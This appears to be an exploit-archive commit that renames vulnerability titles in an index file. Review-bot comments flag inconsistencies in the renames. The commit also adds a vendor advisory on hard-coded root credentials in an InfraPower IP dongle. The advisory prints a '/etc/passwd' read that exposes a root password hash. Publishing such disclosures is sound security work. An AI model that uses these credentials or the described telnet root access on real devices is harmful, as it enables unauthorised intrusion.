DB: 2016-10-29

7 new exploits

SetCMS 3.6.5 - (setcms.org) Remote Command Execution
SetCMS 3.6.5 - Remote Command Execution

PHP-Nuke < 8.0 - 'sid' SQL Injection
PHP-Nuke 8.0 Final - 'sid' SQL Injection
PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection
PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection

Foojan Wms 1.0 - (index.php story) SQL Injection
Foojan Wms 1.0 - 'story' Parameter SQL Injection

Web Wiz Forums 9.07 - (sub) Directory Traversal
Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal

Web Wiz NewsPad 1.02 - (sub) Directory Traversal
Siteman 1.1.9 - (cat) Remote File Disclosure
Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution
SLAED CMS 2.5 Lite - (newlang) Local File Inclusion
Liquid-Silver CMS 0.1 - (update) Local File Inclusion
Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal
Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure
Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution
SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion
Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion

Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure
ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)
Seagull 0.6.3 - 'files' Parameter Remote File Disclosure
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)

flinx 1.3 - (category.php id) SQL Injection
flinx 1.3 - 'id' Parameter SQL Injection

Persits XUpload 3.0 - AddFile() Remote Buffer Overflow
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow

simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting

WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection
WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection
Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)
Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)
WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection
WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection
Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)
Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)

phpMyClub 0.0.1 - (page_courante) Local File Inclusion
bubbling library 1.32 - dispatcher.php Remote File Disclosure
Bigware Shop 2.0 - pollid SQL Injection
Smart Publisher 1.0.1 - (disp.php) Remote Code Execution
SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit
phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion
bubbling library 1.32 - 'uri' Parameter Remote File Disclosure
Bigware Shop 2.0 - 'pollid' Parameter SQL Injection
Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution
SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit

phpCMS 1.2.2 - (parser.php) Remote File Disclosure
Mambo Component NewsLetter - (listid) SQL Injection
Mambo Component Fq - (listid) SQL Injection
Mambo Component MaMML - (listid) SQL Injection
phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure
Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection
Mambo 'com_fq' - 'listid' Parameter SQL Injection
Mambo 'com_mamml' - 'listid' Parameter SQL Injection

phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
phpCMS 1.1.7 - 'parser.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion

phpCMS 2008 - 'ask/search_ajax.php' SQL Injection
phpCMS 2008 - 'search_ajax.php' SQL Injection

InfraPower PPS-02-S Q213V1 - Local File Disclosure
InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference
InfraPower PPS-02-S Q213V1 - Authentication Bypass
InfraPower PPS-02-S Q213V1 - Multiple XSS
InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery
InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
parent d97b4f7c48
commit 3b565e4e9d
8 changed files with 1462 additions and 39 deletions

files.csv (85 lines changed)
@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
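Review bot: the title normalisation in this hunk is incomplete and in one row adds information the old title did not carry. 5007 goes from "Mambo Component NewsLetter - (listid) SQL Injection" to "Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection", introducing a version "4.5" that neither the old title nor the sibling rows 5008 and 5009 (same author, same date, same rename pattern) have; either all three carry the version or none does. In the same hunk 5011 "Mambo Component musepoes - (aid) SQL Injection" and 5012 "Connectix Boards 0.8.2 - template_path Remote File Inclusion" keep the "(param)" and bare-parameter forms that every other changed row is converting to "'param' Parameter", and 5001 keeps lowercase "bubbling library 1.32" right after 4991 "Bubbling Library 1.32". Suggest "Mambo Component musepoes - 'aid' Parameter SQL Injection", "Connectix Boards 0.8.2 - 'template_path' Parameter Remote File Inclusion" and "Bubbling Library 1.32 - 'uri' Parameter Remote File Disclosure" so the pass is consistent within itself.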
@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
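Review bot: the ten phpCMS 1.1.7 renames (29343 to 29352) drop the PHPCMS_INCLUDEPATH parameter name along with the include/ path, e.g. "phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion" becomes "phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion". For a remote file inclusion the parameter name is the most useful search key, and the convention applied elsewhere in this commit keeps it ("'newlang' Parameter Local File Inclusion"), so prefer "phpCMS 1.1.7 - 'class.parser_PHPcms.php' PHPCMS_INCLUDEPATH Parameter Remote File Inclusion" and the same for the other nine; dropping the stray "PHPCMS " token from the old 29346 title is correct. The unchanged rows 29342 ("DIR Parameter"), 29375 ("archive.php SQL Injection") and 29376 ("gbrowse.php Cross-Site Scripting") still carry the unquoted forms this pass is removing, and 29354 sits after 29375 and 29376 although the file is otherwise ordered by id.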
@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
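Review bot: the single change here, 32873 going from "'ask/search_ajax.php'" to "'search_ajax.php'", removes the only path hint for that file; it matches the include/ drops in the phpCMS 1.1.7 rows, so if bare file names are the house convention this is fine, but it should be stated somewhere since other rows in the file (32870 "'AWStats.pl'", 32874 "'search.aspx'") give no way to tell whether a path was ever present. While touching this range, 32871 "ExpressionEngine 1.6 - Avtaar Name HTML Injection" looks like a typo for "Avatar" and is left as is.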
@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
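Review bot: the seven InfraPower rows are inserted between 40633 and 40634 in the order 40642, 40644, 40645, 40641, 40646, 40643, 40640, while the rest of files.csv is ordered by id; sort them 40640 to 40646 and place them after 40636 (they are dated 2016-10-28 and currently precede the 2016-10-27 rows 40634 to 40636). The platform/type columns are also inconsistent for what is one device and one firmware: five rows are php,webapps, 40643 is hardware,remote and 40640 is hardware,webapps, and the file paths follow the same split; pick one platform for all seven (hardware fits, since the advisories target the IP dongle firmware). Finally 40643 leaves the port column at 0 although the advisory it indexes describes root access over the telnet daemon on port 23, so that row should carry 23.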
platforms/hardware/remote/40643.txt (195 lines, executable file)
@ -0,0 +1,195 @@
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php


27.09.2016

--


# cat /etc/passwd

root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
